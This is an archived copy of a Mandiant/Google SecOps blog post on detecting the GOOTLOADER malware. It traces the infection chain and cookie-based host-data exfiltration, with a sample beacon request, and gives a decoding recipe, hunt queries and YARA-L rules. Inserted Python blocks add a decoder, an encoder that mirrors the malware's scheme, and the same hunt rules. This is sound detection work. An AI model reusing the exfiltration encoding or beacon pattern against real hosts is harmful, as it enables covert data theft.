{
	"id": "f23f2905-0da7-4ddf-ae6a-4132e7faceb1",
	"created_at": "2026-04-06T00:10:02.907852Z",
	"updated_at": "2026-04-10T03:33:12.684401Z",
	"deleted_at": null,
	"sha1_hash": "bbc6fbc3c573715027731175ee6e287858152737",
	"title": "Finding Malware: Detecting GOOTLOADER with Google Security Operations.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2958793,
	"plain_text": "Finding Malware: Detecting GOOTLOADER with Google Security\r\nOperations.\r\nBy andy2002a\r\nPublished: 2024-10-31 · Archived: 2026-04-05 21:48:17 UTC\r\nWelcome to the Finding Malware Series\r\nThe \"Finding Malware\" blog series from Managed Defense is designed to empower the Google Security Operations\r\ncommunity to detect emerging and persistent malware threats. This post dives into the GOOTLOADER malware family\r\nand the detection opportunities available within the Google Security Operations (SecOps) platform. You can read the other\r\ninstallments to the series here. Happy hunting! \r\nAbout GOOTLOADER\r\nAlso known as: SLOWPOUR, Gootkit Loader\r\nGOOTLOADER is an obfuscated JavaScript downloader which Mandiant has observed being distributed in multiple\r\ncampaigns since 2021. In such campaigns, victims are tricked via search engine optimization (SEO) poisoning into\r\ndownloading archives from compromised websites. These archives contain the GOOTLOADER malware, which users then\r\nextract and execute on hosts.\r\nGOOTLOADER has been distributed by financially-motivated threat actors including UNC2565 as a means of initial\r\naccess to an environment. Successful GOOTLOADER infections have led to data exfiltration, extortion, and ransomware\r\ndeployment, as highlighted in a CISA advisory from August 2024.\r\nMandiant Managed Defense has observed the constant evolution of the GOOTLOADER malware such as the addition of\r\nnew payloads and obfuscation techniques. This has likely been done by the malware authors as a way to evade detection.\r\nDelivery\r\nIn typical campaigns distributing GOOTLOADER, victims are lured into visiting compromised WordPress websites via\r\nSEO poisoning. Victims perform a search, often for business-related documents such as legal requirements, agreements, or\r\ncontracts, and navigate to a compromised site with information purportedly related to their search. 
Victims then download an\r\narchive containing the malware, and extract and execute the malicious JavaScript file.\r\nBoth the archive and the JavaScript file have names that closely resemble the victim's search query. This naming scheme\r\nhelps trick the user into extracting and executing the malware.\r\nFigure 1: Screenshot of a compromised web page distributing GOOTLOADER malware (captured March 2024)\r\nGOOTLOADER Infection Chain\r\nThe typical GOOTLOADER infection chain consists of the following:\r\n.zip archive is downloaded from a compromised WordPress website.\r\n.js file (GOOTLOADER) from the .zip archive is extracted and executed.\r\nThis initial .js script saves a second stage payload to %AppData% with a .dat or .log file extension.\r\nThe .dat/.log file is renamed to .js.\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766\r\nPage 1 of 7\n\nA scheduled task is created to run the second stage .js file.\r\nThe second stage file decodes and executes an embedded GOOTLOADER.POWERSHELL payload that reaches\r\nout to the C2.\r\nFigure 2: GOOTLOADER components\r\nThe stages of the infection chain are explained in further detail below.\r\nFirst Stage JavaScript Execution\r\nThe extracted JavaScript is typically an open-source JavaScript library file, with the GOOTLOADER code embedded in it.\r\nThis technique aims to avoid detection by hiding an obfuscated JavaScript payload within a legitimate JavaScript library\r\nfile.\r\nThe typical first stage process tree during an infection is as follows:\r\nexplorer.exe ↳ \"C:\\\\Windows\\\\System32\\\\WScript.exe\" \"C:\\\\Users\\\\%USERNAME%\\\\AppData\\\\Local\\\\Temp\\\\\r\n\u003cZIP_FILE_NAME\u003e.zip\\\\\u003cJS_FILE_NAME\u003e.js\" (Execution of the downloaded malware)\r\nDespite being obfuscated, it is possible to extract the malware configuration from the first stage .js file by leveraging this\r\nPython script as described in a 
previous blog. This capability is also available to VirusTotal Enterprise users under the\r\nMalware configuration file section. \r\nFigure 3: Managed Defense’s Backscatter script allows VT Enterprise users to extract GOOTLOADER configurations.\r\nSecond Stage JavaScript Execution\r\nGOOTLOADER contains an obfuscated second stage payload that is decoded and saved to \r\nC:\\\\Users\\\\%USERNAME%\\\\AppData\\\\Roaming\\\\\u003cRANDOM_DIRECTORY\u003e\\\\\u003cHARD_CODED_FILE_NAME\u003e\r\nwith a file extension of .dat or .log. It is then renamed to .js. These file names are hard-coded in the original .js script file,\r\nand the file is padded with 40-60MB of junk characters in order to increase its size and avoid detection.\r\nA scheduled task is created in order to launch the second stage .js file. The task serves as a form of persistence and a way to\r\nexecute the second stage file for the first time.\r\nThe name of the scheduled task is hard-coded into the malware and usually includes business themes such as “Regulatory Communication” or “Motivated Operations”. The task will run at every user login, and the task action (command) will be\r\nset to the following:\r\nwscript \u003cSECOND_STAGE_8.3_FILENAME\u003e.JS\r\nExecution of the scheduled task results in the following process tree, where the second stage .js file is first executed by\r\nwscript.exe, which in turn runs the file with cscript.exe:\r\nsvchost.exe (Scheduled Task) ↳ \"C:\\\\WINDOWS\\\\system32\\\\wscript.EXE\" \u003cSECOND_STAGE_8.3_FILENAME\u003e~1.JS ↳\r\n\"C:\\\\Windows\\\\System32\\\\cscript.exe\" \"\u003cSECOND_STAGE_8.3_FILENAME\u003e~1.JS\" ↳ powershell\r\nGOOTLOADER.POWERSHELL Execution\r\nThe second stage JavaScript decodes an embedded PowerShell script which Mandiant tracks as\r\nGOOTLOADER.POWERSHELL. 
This PowerShell script performs the following steps (note that the script has been\r\ndeobfuscated and its randomly-named functions/variables renamed to improve readability):\r\n1. The script starts with a while loop that randomly selects 1 of 10 hard-coded URLs and passes it to the c2_connect\r\nfunction.\r\nFigure 4: Initial PowerShell loop\r\n2. The c2_connect function acquires data about the host such as the operating system, environment variables, running\r\nprocesses, files/folders, and storage drives.\r\nFigure 5: c2_connect function\r\n3. The script compresses the collected information using gzip and then Base64 encodes it before sending it to the C2 server. Prior\r\nto Base64 encoding, the script adds hard-coded bytes to the beginning and end of the compressed data (\u003cbytes\u003e\u003cgzip-Data\u003e\u003cbytes\u003e).\r\nThis serves as a form of obfuscation, making it challenging to decode the compressed information without prior knowledge\r\nof those specific bytes. Note that Mandiant observed this additional obfuscation step in GOOTLOADER.POWERSHELL\r\ncompromises beginning roughly in June 2024. Previous versions of GOOTLOADER.POWERSHELL did not have this\r\nadditional step.\r\nFigure 6: data encoding function\r\n4. The gzip-compressed, Base64-encoded data, along with a hard-coded unique identifier ($unique_id), is placed in the HTTP Cookie header and\r\nsent through an HTTP GET request.\r\nBelow is a sample of an HTTP GET request with the $unique_id 1234567890. 
The numbers 1 to 4 are appended to the\r\n$unique_id and represent the type of system information.\r\n1234567890 – environment variables and OS information\r\n12345678901 – running processes\r\n12345678902 – running desktop applications\r\n12345678903 – files, links, and folders on the desktop\r\n12345678904 – local disk drives with size of used disk space\r\nGET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36\r\nCookie: 1234567890=DwxFwXG9220+H4sIAAAAAAAEAJVVW2+bMBT+K6C9bNKKcmvSLk8UnMQdxsh2kk5CIJa4LSvBCOhN4sfPJqEhTZVuD1x8zufDuXyfMR1nTgGhHsET6IDA+uF7ubjLo4\r\n12345678901=DwxFwXG9220+H4sIAAAAAAAEAGVR7W7bMAx8lfoF/A5Z6jUeVjSI2xX7FSgWY2uRRIGUvwA//Cjba4sMBijpjjyTvF0I1tQqGvTfSTk4IMc5uxAODHSW8wY0ZzX6d\r\nLUbkL0ihG7h77o93QHW4A96CVlHKHOtYz9mLh0cyvQABByBuwdqv97Nh4UiH2powZydoDEeaBOouEk+dj8bBt22pFSiq29JrGD+facAK6o5MnA6gbGwroN7U8B88ibQSVV55mbVqy\r\njJcvLheb3BdJZ47UV8Wc/caOxGQPfwEdasVywgIAABsMr3rFZrDa0g==;\r\n12345678902=DwxFwXG9220+H4sIAAAAAAAEAHMsKMjJTE4syczPcytKzE31yC8uifPNTC7KL85PK1FwTUlPrVGE80Fc/LLOARjyBfnlqUXFGak5OXHhmXkp+eXFCgEgoWCQELJ0f\r\n12345678903=DwxFwXG9220+H4sIAAAAAAAEAF2KQQrCMBBFrzI9gGLtDWxdCNIGqQeI8YODcaZMokXI4c3a1X+P99v5wYlcX5r2gvANEXRgqdarZNNIzgti9dPxmmAVznwzb4xUm\r\n12345678904=DwxFwXG9220+H4sIAAAAAAAEAHOOM7YwMDM2NrI0sjAAAKRsSCYNAAAAGwyvesVmsNrS\r\nHost: example[.]com\r\nConnection: Close\r\nThe contents of the HTTP Cookie header can be decoded using the CyberChef recipe below. 
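The same encoding and decoding in Python, as an added example that is not part of the original post and not Mandiant's tooling. The sender side mirrors the scheme described in steps 3 and 4 (gzip, hard-coded bytes on both ends, Base64, one cookie per data type suffix) so that the decoder has input to work on; the decoder does what the CyberChef recipe does, seeking the gzip magic bytes and inflating from there, so the marker bytes need not be known. The marker byte values, the $unique_id and the host data are constructed assumptions, not values from a real sample.

```python
import base64
import gzip
import zlib

# Hypothetical stand-ins for the hard-coded bytes the PowerShell stage wraps
# around the gzip stream; the real values are sample-specific and not published here.
PREFIX = bytes.fromhex('0f0c45c1')
SUFFIX = bytes.fromhex('c9a0d0a0')
GZIP_MAGIC = bytes.fromhex('1f8b')

# Digit appended to $unique_id -> kind of host data carried in that cookie.
INFO_KINDS = {
    '': 'environment variables and OS information',
    '1': 'running processes',
    '2': 'running desktop applications',
    '3': 'files, links, and folders on the desktop',
    '4': 'local disk drives with size of used disk space',
}


def encode_value(plaintext: bytes) -> str:
    '''Sender side: gzip, wrap with the marker bytes, then Base64 (the post-June-2024 scheme).'''
    body = PREFIX + gzip.compress(plaintext) + SUFFIX
    return base64.b64encode(body).decode('ascii')


def decode_value(value: str) -> bytes:
    '''Receiver side, without knowing the marker bytes: Base64-decode, seek the
    gzip magic 1F 8B, inflate from there and ignore whatever trails the member.'''
    raw = base64.b64decode(value)
    start = raw.find(GZIP_MAGIC)
    if start < 0:
        raise ValueError('no gzip member in cookie value')
    inflater = zlib.decompressobj(wbits=31)   # 31 selects gzip framing
    data = inflater.decompress(raw[start:])   # trailing marker lands in unused_data
    if not inflater.eof:
        raise ValueError('gzip member is truncated')
    return data


def parse_cookie(header: str, unique_id: str) -> dict:
    '''Split a Cookie header into {data kind: decoded bytes} for the given $unique_id.'''
    decoded = {}
    for pair in header.split(';'):
        name, sep, value = pair.strip().partition('=')
        if not sep or not name.startswith(unique_id):
            continue
        suffix = name[len(unique_id):]
        kind = INFO_KINDS.get(suffix, 'unknown suffix ' + suffix)
        decoded[kind] = decode_value(value)
    return decoded


# Constructed sample: three of the five cookies a beacon for $unique_id 1234567890 would carry.
UNIQUE_ID = '1234567890'
SAMPLE_HEADER = '; '.join([
    UNIQUE_ID + '=' + encode_value(b'OS=Windows 10 Pro; USERNAME=alice'),
    UNIQUE_ID + '1=' + encode_value(b'explorer.exe,wscript.exe,powershell.exe'),
    UNIQUE_ID + '4=' + encode_value(b'C: 512 GB, 301 GB used'),
])

if __name__ == '__main__':
    for kind, data in parse_cookie(SAMPLE_HEADER, UNIQUE_ID).items():
        print(kind, '->', data.decode())
```

Run as a script it prints each decoded cookie. The regex step of the CyberChef recipe is replaced by a byte search for 1F 8B plus letting zlib stop at the end of the gzip member, which is why the trailing marker bytes can simply be ignored; a value that has no gzip member at all (for example a beacon from a sample using different framing) raises ValueError instead of returning garbage.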
The CyberChef recipe\r\nperforms the following actions:\r\nDecode the data from Base64 and convert it to hex.\r\nUse a regex to extract the data from the gzip magic bytes (1F 8B) until the end (00) of the line, which skips the hard-coded bytes placed before the gzip stream.\r\nConvert the match back from hex and decompress the result using Gunzip.\r\nFrom_Base64('A-Za-z0-9+/=',true,false) To_Hex('Space',0) Regular_expression('User defined','1f 8b.*(00)',true,true,false,false,false,false,'List matches') From_Hex('Auto') Gunzip()\r\nFigure 7: CyberChef recipe that decodes data\r\n5. If the C2 responds to the GOOTLOADER.POWERSHELL request, then an additional payload is downloaded and\r\nexecuted using PowerShell’s Invoke-Expression cmdlet. Note that the C2 response must contain the host’s $unique_id in\r\norder for the command to execute. In some instances this response can occur several hours after the initial infection.\r\nIn the past the payload was FONELAUNCH, a .NET-based launcher that is written to the registry. However, in mid-2024\r\nthis has changed to a malicious DLL file that is executed using a renamed copy of rundll32.exe. In some instances this\r\nDLL file has been associated with CLEANBOOST, a backdoor malware.\r\nFurther steps in GOOTLOADER infections vary, but these initial compromises can lead to lateral movement in the\r\nenvironment followed by financially-motivated threat actor activity like ransomware deployment.\r\nThreat Hunting \u0026 Detection in Google SecOps\r\nHunting Opportunities\r\nMandiant Hunt surfaces otherwise undetected malicious activity by employing a detection strategy that uses both strong\r\nsignals (high enough fidelity to be reviewed 1:1) and weak signals (low fidelity on their own but provide broad coverage of\r\nthreat actor tactics) to enumerate attacker activity in customer environments. These signals are used to sequentially funnel\r\npetabytes of telemetry data to a practicable number of enriched and highly curated cases for analyst review. 
Mandiant uses\r\nsecurity frameworks like MITRE ATT\u0026CK® to help label data, find interesting sequences of activity, and share actionable\r\nresults with customers.\r\nGoogle SecOps customers can use the following information to hunt for GOOTLOADER as well as other malicious\r\nactivity using similar tactics:\r\nFilewrite with suspicious extension to archive directory - Filewrites with these attributes may represent users\r\nextracting potentially-malicious files from archives. This is a common delivery mechanism for many malware\r\nfamilies, including GOOTLOADER. \r\nThese events map to MITRE ATT\u0026CK Technique T1204.002 - User Execution: Malicious File. Some examples\r\ninclude:\r\nC:\\\\Users\\\\\u003cUser\u003e\\\\AppData\\\\Local\\\\Temp\\\\Legal_document_example_search_94721.zip\\\\legal document example search 90126.js\r\nC:\\\\Users\\\\\u003cUser\u003e\\\\AppData\\\\Local\\\\Temp\\\\fd3d6123-433a-4efb-a123-c43af0fa2f29_Legal_document_example_search(94721).zip.a58\\\\legal_document_example_search(90126).js\r\nUse the UDM query below in Google Security Operations to identify such file writes. 
The detection logic will likely find\r\nnumerous innocuous events in your environment, so add exclusions to those already included at the bottom of the\r\nquery to filter out the noise until interesting results remain.\r\n( metadata.event_type = \"FILE_CREATION\" OR metadata.event_type = \"FILE_MODIFICATION\" ) AND (\r\ntarget.file.full_path = /users/ nocase AND ( target.file.full_path = /\\\\.zip/ nocase OR target.file.full_path =\r\n/\\\\.rar/ nocase ) AND ( target.file.full_path = /vbs$/ nocase OR target.file.full_path = /js$/ nocase OR\r\ntarget.file.full_path = /hta$/ nocase OR target.file.full_path = /wsf$/ nocase OR target.file.full_path =\r\n/iso$/ nocase OR target.file.full_path = /img$/ nocase OR target.file.full_path = /vhd$/ nocase ) AND (\r\nprincipal.process.file.full_path = /rar/ nocase OR principal.process.file.full_path = /7z/ nocase OR\r\nprincipal.process.file.full_path = /explorer/ nocase ) AND NOT target.file.full_path = /setup\\\\.hta$/ nocase\r\nAND NOT target.file.full_path = /\\\\\\\\VSCode\\\\\\\\/ nocase AND NOT target.file.full_path = /index\\\\.js$/ nocase\r\nAND NOT target.file.full_path = /jquery/ nocase AND NOT target.file.full_path = /INetCache/ nocase )\r\nHTTP request with header containing long “Cookie” value - Mandiant has observed GOOTLOADER infections\r\nlead to exfiltration of host information via HTTP requests containing the data in the header. These events map to\r\nMITRE ATT\u0026CK Technique T1041 - Exfiltration Over C2 Channel.\r\nUse the UDM query below in Google Security Operations to identify such exfiltration.\r\n( metadata.event_type = \"NETWORK_CONNECTION\" OR metadata.event_type = \"NETWORK_HTTP\" ) AND target.url =\r\n/Cookie:\\\\s[\\\\w=\\\\/+]{750,};/\r\nSuspicious Windows Script Host process execution - In GOOTLOADER compromises, execution of the second-stage payloads was performed by the Windows Script Host (WSH) binaries wscript.exe and cscript.exe. 
In such\r\ncompromises, the instance of cscript.exe launches a JavaScript file, which is an uncommon event in most\r\nenvironments. These events map to MITRE ATT\u0026CK Technique T1059.007 - Command and Scripting Interpreter:\r\nJavaScript.\r\nUse the UDM query below in Google Security Operations to identify process events where wscript.exe\r\nlaunches cscript.exe to execute a non-VBScript file. While not necessarily malicious, this activity is uncommon in\r\nmost environments and should be investigated to determine if it was legitimate.\r\nprincipal.process.file.full_path = /wscript\\\\.exe/ nocase AND target.process.file.full_path = /cscript\\\\.exe/\r\nnocase AND NOT principal.process.command_line = /\\\\.vbs/ nocase AND NOT target.process.command_line = /\\\\.vbs/\r\nnocase\r\nPowerShell filewrites to AppData\\\\Roaming or AppData\\\\Local\\\\Temp - Following exfiltration of host\r\ninformation, Mandiant has observed GOOTLOADER compromises lead to PowerShell downloading additional\r\npayloads. In some instances, the additional payloads included a portable executable and a DLL file, with obfuscated\r\nfile names and extensions. These events map to MITRE ATT\u0026CK Technique T1059.001 - Command and Scripting\r\nInterpreter: PowerShell.\r\nUse the UDM query below in Google Security Operations to identify PowerShell writing\r\nfiles with suspicious extensions to either the AppData\\\\Roaming or AppData\\\\Local\\\\Temp directories. The\r\ndetection logic will likely find numerous innocuous events in your environment, so add exclusions to those already\r\nincluded at the bottom of the query to filter out the noise until interesting results remain. 
This activity is not exclusive\r\nto GOOTLOADER compromises; Mandiant has observed many malware families leveraging these directories to\r\nstore malicious files.\r\n( metadata.event_type = \"FILE_CREATION\" OR metadata.event_type = \"FILE_MODIFICATION\" ) AND (\r\nprincipal.process.file.full_path = /\\\\\\\\powershell\\\\.exe$/ nocase AND ( target.file.full_path =\r\n/\\\\\\\\AppData\\\\\\\\Roaming(\\\\\\\\[^\\\\\\\\\\\\/]+)?\\\\\\\\[^\\\\\\\\\\\\/]+\\\\.(svg|zip|rar|asp|png|jpg|iso|7z|html|doc|[A-Za-z]{5,8})$/ OR\r\ntarget.file.full_path = /\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\[^\\\\\\\\\\\\/]+\\\\.(svg|zip|rar|asp|jpg|iso|7z|doc)$/ ) AND (\r\nprincipal.process.parent_process.file.full_path = /\\\\\\\\explorer\\\\.exe/ nocase OR\r\nprincipal.process.parent_process.file.full_path = /\\\\\\\\cmd\\\\.exe/ nocase OR\r\nprincipal.process.parent_process.file.full_path = /\\\\\\\\mshta\\\\.exe/ nocase OR\r\nprincipal.process.parent_process.file.full_path = /\\\\\\\\RuntimeBroker\\\\.exe/ nocase OR\r\nprincipal.process.parent_process.file.full_path = /\\\\\\\\WinRAR\\\\.exe/ nocase OR\r\nprincipal.process.parent_process.file.full_path = /\\\\\\\\sihost\\\\.exe/ nocase OR\r\nprincipal.process.parent_process.file.full_path = /\\\\\\\\Installer\\\\.exe/ nocase OR\r\nprincipal.process.parent_process.file.full_path = /\\\\\\\\cmd\\\\.exe/ nocase ) )\r\nGoogle Security Operations Enterprise and Enterprise Plus customers will benefit from these detections being applied\r\nautomatically through curated detections. Standard customers can use the YARA-L rules below to create single or multi-event rules to detect the malware. You can even ask Gemini in Google Security Operations to do it for you. 
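Before the rules themselves, the same hunt logic outside the platform, as an added Python example that is not part of the original post and not one of Mandiant's curated detections: four of the checks from the UDM queries above and the YARA-L rules below (a script-type file extracted from a .zip/.rar under Users, wscript.exe spawning cscript.exe for something other than a .vbs, a scheduled task action that runs a .js by its 8.3 short name, and a large .dat/.log/.js dropped by wscript.exe under the AppData Roaming directory) are re-expressed with Python's re module and run over constructed UDM-style events. The Event fields, paths, file sizes, command lines and the short name REGULA~1.JS are assumptions standing in for real telemetry.

```python
import re
from dataclasses import dataclass

BS = chr(92)          # a single backslash, the Windows path separator
SEP = re.escape(BS)   # that separator escaped for use inside a pattern
DQ = chr(34)          # a double-quote character, seen around quoted script names


def winpath(*parts):
    '''Join path components with backslashes.'''
    return BS.join(parts)


@dataclass
class Event:
    '''Minimal UDM-style event carrying only the fields the hunts below inspect.'''
    event_type: str
    principal_path: str = ''      # principal.process.file.full_path
    principal_cmdline: str = ''   # principal.process.command_line
    target_path: str = ''         # target.file.full_path or target.process.file.full_path
    target_cmdline: str = ''      # target.process.command_line
    target_file_size: int = 0     # target.file.size


# Hunt: script-type file written from a .zip/.rar under Users by an archiver or explorer (T1204.002).
ARCHIVE_MEMBER = re.compile('users.*[.](zip|rar).*[.](vbs|js|hta|wsf|iso|img|vhd)$', re.I)
EXTRACTOR = re.compile('rar|7z|explorer', re.I)
EXTRACT_NOISE = re.compile('setup[.]hta$|' + SEP + 'VSCode' + SEP + '|index[.]js$|jquery|INetCache', re.I)


def hunt_archive_extract(e):
    return (e.event_type in ('FILE_CREATION', 'FILE_MODIFICATION')
            and bool(ARCHIVE_MEMBER.search(e.target_path))
            and bool(EXTRACTOR.search(e.principal_path))
            and not EXTRACT_NOISE.search(e.target_path))


# Hunt: wscript.exe spawning cscript.exe for something other than a .vbs (T1059.007).
def hunt_wscript_to_cscript(e):
    return (bool(re.search('wscript[.]exe', e.principal_path, re.I))
            and bool(re.search('cscript[.]exe', e.target_path, re.I))
            and not re.search('[.]vbs', e.principal_cmdline, re.I)
            and not re.search('[.]vbs', e.target_cmdline, re.I))


# gootloader_task_create: the task action runs a .js through its 8.3 short name (T1053.005).
SHORT_NAME_JS = re.compile('(c|w)script([.]exe)?([' + DQ + ' ]){1,3}[A-Z0-9]{6}~1[.]js', re.I)


def hunt_task_create(e):
    return (e.event_type in ('SCHEDULED_TASK_CREATION', 'SCHEDULED_TASK_MODIFICATION')
            and bool(SHORT_NAME_JS.search(e.target_cmdline)))


# gootloader_second_stage_create: wscript.exe drops a large .dat/.log/.js in the Roaming profile directory.
SECOND_STAGE = re.compile(
    SEP + 'users' + SEP + '.+' + SEP + 'AppData' + SEP + 'Roaming' + SEP + '.+[.](js|log|dat)$', re.I)


def hunt_second_stage_create(e):
    return (e.event_type == 'FILE_CREATION'
            and bool(SECOND_STAGE.search(e.target_path))
            and bool(re.search('wscript', e.principal_path, re.I))
            and e.target_file_size >= 4000000)


HUNTS = {
    'archive_extract': hunt_archive_extract,
    'wscript_to_cscript': hunt_wscript_to_cscript,
    'task_create': hunt_task_create,
    'second_stage_create': hunt_second_stage_create,
}


def run_hunts(events):
    '''Return {hunt name: [indexes of the events it matched]}.'''
    return {name: [i for i, e in enumerate(events) if hunt(e)] for name, hunt in HUNTS.items()}


TEMP = winpath('C:', 'Users', 'alice', 'AppData', 'Local', 'Temp')
ROAMING = winpath('C:', 'Users', 'alice', 'AppData', 'Roaming')
SYS32 = winpath('C:', 'Windows', 'System32')

# Constructed sample telemetry (not from a real case): indexes 0, 2, 4 and 5 should fire,
# the others are benign look-alikes that the exclusions or thresholds must keep quiet.
SAMPLE_EVENTS = [
    Event('FILE_CREATION', principal_path=winpath('C:', 'Windows', 'explorer.exe'),
          target_path=winpath(TEMP, 'legal_agreement_template_48213.zip', 'legal agreement template 48213.js')),
    Event('FILE_CREATION', principal_path=winpath('C:', 'Windows', 'explorer.exe'),
          target_path=winpath(TEMP, 'frontend-1.2.3.zip', 'dist', 'index.js')),
    Event('PROCESS_LAUNCH', principal_path=winpath(SYS32, 'wscript.EXE'), principal_cmdline='wscript.EXE REGULA~1.JS',
          target_path=winpath(SYS32, 'cscript.exe'), target_cmdline='cscript.exe ' + DQ + 'REGULA~1.JS' + DQ),
    Event('PROCESS_LAUNCH', principal_path=winpath(SYS32, 'wscript.exe'), principal_cmdline='wscript.exe logon.vbs',
          target_path=winpath(SYS32, 'cscript.exe'), target_cmdline='cscript.exe logon.vbs'),
    Event('SCHEDULED_TASK_CREATION', target_cmdline='wscript REGULA~1.JS'),
    Event('FILE_CREATION', principal_path=winpath(SYS32, 'wscript.exe'),
          target_path=winpath(ROAMING, 'Regulatory Communication', 'Motivated Operations.dat'), target_file_size=52000000),
    Event('FILE_CREATION', principal_path=winpath(SYS32, 'wscript.exe'),
          target_path=winpath(ROAMING, 'Microsoft', 'Windows', 'Recent', 'notes.log'), target_file_size=1024),
]

if __name__ == '__main__':
    for name, hits in run_hunts(SAMPLE_EVENTS).items():
        print(name, '->', hits)
```

The patterns keep the search-anywhere semantics of the UDM regex operator, so the same exclusions the page recommends (index.js, jquery, VSCode, INetCache) are what separate the benign archive extraction at index 1 from the lure-named one at index 0; the 4,000,000-byte threshold comes from gootloader_second_stage_create and is well below the 40-60MB padding described earlier.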
\r\nThis rule detects the extraction of a GOOTLOADER js file to a Temp folder:\r\nrule gootloader_js_extract {\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"This rule matches the extraction of a GOOTLOADER js file by explorer.exe.\"\r\n        mitre_attack_tactic = \"Execution\"\r\n        mitre_attack_technique = \"User Execution: Malicious File\"\r\n        mitre_attack_url = \"https://attack.mitre.org/techniques/T1204/002/\"\r\n        mitre_attack_version = \"v15.1\"\r\n        severity = \"High\"\r\n        priority = \"High\"\r\n        platform = \"Windows\"\r\n        type = \"hunt\"\r\n    events:\r\n        re.regex($e.file_path, `\\\\\\\\users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\.+(_|\\\\s|\\\\()\\\\d{4,5}.?\\\\.zip.+\\\\.js$`) nocase and\r\n        re.regex($e.principal.process.file.full_path, `explorer\\\\.exe`) nocase and\r\n        $e.metadata.event_type = \"FILE_CREATION\"\r\n    condition:\r\n        $e\r\n}\r\nThis rule identifies the execution of GOOTLOADER malware from the Temp folder:\r\nrule gootloader_js_execute {\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"This rule matches the execution of a GOOTLOADER js file from a temporary directory.\"\r\n        mitre_attack_tactic = \"Execution\"\r\n        mitre_attack_technique = \"Command and Scripting Interpreter: JavaScript\"\r\n        mitre_attack_url = \"https://attack.mitre.org/techniques/T1059/007/\"\r\n        mitre_attack_version = \"v15.1\"\r\n        severity = \"High\"\r\n        priority = \"High\"\r\n        platform = \"Windows\"\r\n        type = \"hunt\"\r\n    events:\r\n        re.regex($e.target.process.command_line, `wscript\\\\.exe.+\\\\\\\\users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\.+\\\\.js`) nocase or\r\n        re.regex($e.principal.process.command_line, `wscript\\\\.exe.+\\\\\\\\users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\.+\\\\.js`) nocase\r\n    condition:\r\n        $e\r\n}\r\nThis rule identifies the creation of a large .dat, .log, or .js file by wscript.exe:\r\nrule gootloader_second_stage_create {\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"This rule matches the creation of a large .dat, .log, or .js file by wscript.exe\"\r\n        mitre_attack_tactic = \"Execution\"\r\n        mitre_attack_technique = \"Command and Scripting Interpreter: JavaScript\"\r\n        mitre_attack_url = \"https://attack.mitre.org/techniques/T1059/007/\"\r\n        mitre_attack_version = \"v15.1\"\r\n        severity = \"High\"\r\n        priority = \"High\"\r\n        platform = \"Windows\"\r\n        type = \"hunt\"\r\n    events:\r\n        re.regex($e.target.file.full_path, `\\\\\\\\users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\.+\\\\.(js|log|dat)$`) nocase and\r\n        $e.metadata.event_type = \"FILE_CREATION\" and\r\n        re.regex($e.principal.process.file.full_path, `wscript`) nocase and\r\n        $e.target.file.size \u003e= 4000000\r\n    condition:\r\n        $e\r\n}\r\nThis rule identifies the creation of a GOOTLOADER scheduled task that executes a .js file using its 8.3 filename:\r\nrule gootloader_task_create {\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"This rule matches the creation of a scheduled task that uses an 8.3 filename and a .js extension\"\r\n        mitre_attack_tactic = \"Execution\"\r\n        mitre_attack_technique = \"Scheduled Task/Job: Scheduled Task\"\r\n        mitre_attack_url = \"https://attack.mitre.org/techniques/T1053/005/\"\r\n        mitre_attack_version = \"v15.1\"\r\n        severity = \"High\"\r\n        priority = \"High\"\r\n        platform = \"Windows\"\r\n        type = \"hunt\"\r\n    events:\r\n        ($e.metadata.event_type = \"SCHEDULED_TASK_CREATION\" or $e.metadata.event_type = \"SCHEDULED_TASK_MODIFICATION\") and\r\n        re.regex($e.target.process.command_line, `(c|w)script(\\\\.exe)?(\"|\\\\s){1,3}[A-Z0-9]{6}~1\\\\.js`) nocase\r\n    condition:\r\n        $e\r\n}\r\nThis rule identifies the execution of a GOOTLOADER scheduled task that executes a .js file using its 8.3 filename:\r\nrule gootloader_task_execute {\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"This rule matches the execution of a GOOTLOADER scheduled task that uses an 8.3 filename.\"\r\n        mitre_attack_tactic = \"Execution\"\r\n        mitre_attack_technique = \"Scheduled Task/Job: Scheduled Task\"\r\n        mitre_attack_url = \"https://attack.mitre.org/techniques/T1053/005/\"\r\n        mitre_attack_version = \"v15.1\"\r\n        severity = \"High\"\r\n        priority = \"High\"\r\n        platform = \"Windows\"\r\n        type = \"hunt\"\r\n    events:\r\n        re.regex($e.target.process.command_line, `(c|w)script\\\\.exe(\"|\\\\s){1,3}[A-Z0-9]{6}~1\\\\.js`) nocase or\r\n        re.regex($e.principal.process.command_line, `(c|w)script\\\\.exe(\"|\\\\s){1,3}[A-Z0-9]{6}~1\\\\.js`) nocase\r\n    condition:\r\n        $e\r\n}\r\nHave questions or feedback for the Managed Defense team? Comment on the blog or ask a question in the Managed Defense Forum.\r\nSource: https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766"
	],
	"report_names": [
		"823766"
	],
	"threat_actors": [
		{
			"id": "fc7f0460-0a66-4178-9c5b-75abb22b87b0",
			"created_at": "2023-11-08T02:00:07.15123Z",
			"updated_at": "2026-04-10T02:00:03.427759Z",
			"deleted_at": null,
			"main_name": "UNC2565",
			"aliases": [
				"Hive0127"
			],
			"source_name": "MISPGALAXY:UNC2565",
			"tools": [],
